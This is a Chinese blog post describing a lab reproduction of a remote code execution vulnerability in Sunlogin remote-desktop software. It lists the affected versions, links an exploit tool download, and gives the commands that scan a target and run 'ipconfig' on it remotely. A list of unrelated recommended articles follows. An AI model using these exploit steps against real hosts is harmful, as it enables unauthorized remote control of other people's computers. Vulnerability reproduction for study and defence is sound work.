如何重现向日葵远程代码执行漏洞的过程
最编程
2024-02-05 10:22:36
...
前言
本文内容仅为技术科普,请勿用于非法用途!
一、准备测试环境
1.windows虚拟机(内网IP地址172.16.20.68)
2.kali linux (内网IP地址172.16.20.76)
二、向日葵软件
存在漏洞向日葵版本:11.1.1、10.3.0.27372、11.0.0.33162
三、工具及源码下载地址
链接:https:
提取码:xhil
四、扫描漏洞
1.这里用的kali,所以下载linux版本,并进行解压;
注意:这里需要给解压后的文件xrkRce所有权限(777),不然会提示权限不够;
2.进行漏洞扫描,确认存在漏洞的端口;
./xrkRce -h 172.16.20.68
这里发下端口为65326;
3.现在对漏洞进行利用,进行远程命令,查看对方IP;
./xrkRce -h 172.16.20.68 -c "ipconfig" -p 65326 -t rce
注意:这里可能会提示命令【命令执行完毕,但是没有回显】,需要去开启回显【防火墙-高级设置-出站规则-回显】
更多安全分享,请关注【安全info】微信公众号!
本文使用 文章同步助手 同步
推荐阅读
-
关于 log4j2 远程代码执行漏洞的详细重现过程
-
如何看待 Apache Log4j 2 远程代码执行漏洞?免费动手带你重现它!
-
关于 Apache log4j2 远程代码执行漏洞 (CVE-2021-44228) 的文章
-
修复 Apache Log4j2 远程代码执行漏洞的步骤
-
Java 类加载器的作用 - 简介:类加载器是 Java™ 中一个非常重要的概念。类加载器负责将 Java 类的字节码加载到 Java 虚拟机中。本文首先详细介绍了 Java 类加载器的基本概念,包括代理模型、加载类的具体过程和线程上下文类加载器等。然后介绍了如何开发自己的类加载器,最后介绍了类加载器在 Web 容器和 OSGi™ 中的应用。 类加载器是 Java 语言的一项创新,也是 Java 语言广受欢迎的重要原因之一。它允许将 Java 类动态加载到 Java 虚拟机中并执行。类加载器从 JDK 1.0 开始出现,最初是为了满足 Java Applets 的需求而开发的,Java Applets 需要从远程位置下载 Java 类文件并在浏览器中执行。现在,类加载器已广泛应用于网络容器和 OSGi。一般来说,Java 应用程序的开发人员不需要直接与类加载器交互;Java 虚拟机的默认行为足以应对大多数情况。但是,如果遇到需要与类加载器交互的情况,而您又不太了解类加载器的机制,就很容易花费大量时间调试异常,如 ClassNotFoundException 和 NoClassDefFoundError。本文将详细介绍 Java 的类加载器,帮助读者深入理解 Java 语言中的这一重要概念。下面先介绍一些基本概念。 类加载器的基本概念 顾名思义,类加载器用于将 Java 类加载到 Java 虚拟机中。一般来说,Java 虚拟机以如下方式使用 Java 类:Java 源程序(.java 文件)经 Java 编译器编译后转换为 Java 字节代码(.class 文件)。类加载器负责读取 Java 字节代码并将其转换为 java.lang 实例。每个实例都用来表示一个 Java 类。通过该实例的 newInstance 方法创建该类的对象。实际情况可能更加复杂,例如,Java 字节代码可能是由工具动态生成或通过网络下载的。 基本上,所有类加载器都是 java.lang.ClassLoader 类的实例。下面将详细介绍这个 Java 类。 java.lang.ClassLoader 类简介 java.lang.ClassLoader 类的基本职责是根据给定类的名称为其查找或生成相应的字节码,然后根据这些字节码定义一个 Java 类,即 java.lang.Class 类的实例。除此之外,ClassLoader 还负责加载 Java 应用程序所需的资源,如图像文件和配置文件。不过,本文只讨论它加载类的功能。为了履行加载类的职责,ClassLoader 提供了许多方法,其中比较重要的方法如表 1 所示。下文将详细介绍这些方法。 表 1.与加载类相关的 ClassLoader 方法
-
如何搞定ThinkPHP的远程代码执行漏洞,防止入口文件被恶意篡改
-
入门讲解:Spring源代码探索系列" 1. Spring源码剖析导论 2. Spring容器基础操作实战 3. Spring核心容器组件详解 4. 详解Spring基础:XmlBeanFactory源码解析 5. 掌握关键技术:如何获取并处理Document 6. 精读细节:BeanDefinitions的解析与注册过程 7. 深度解析:bean标签在源码中的执行与注册路径
-
远程CVE-2017-8464漏洞:通过LNK文件实施的执行代码攻击
-
重现CVE-2017-8464:远程代码执行漏洞实操演示
-
重现CVE-2017-8464:远程利用LNK文件(快捷方式)引发的执行代码漏洞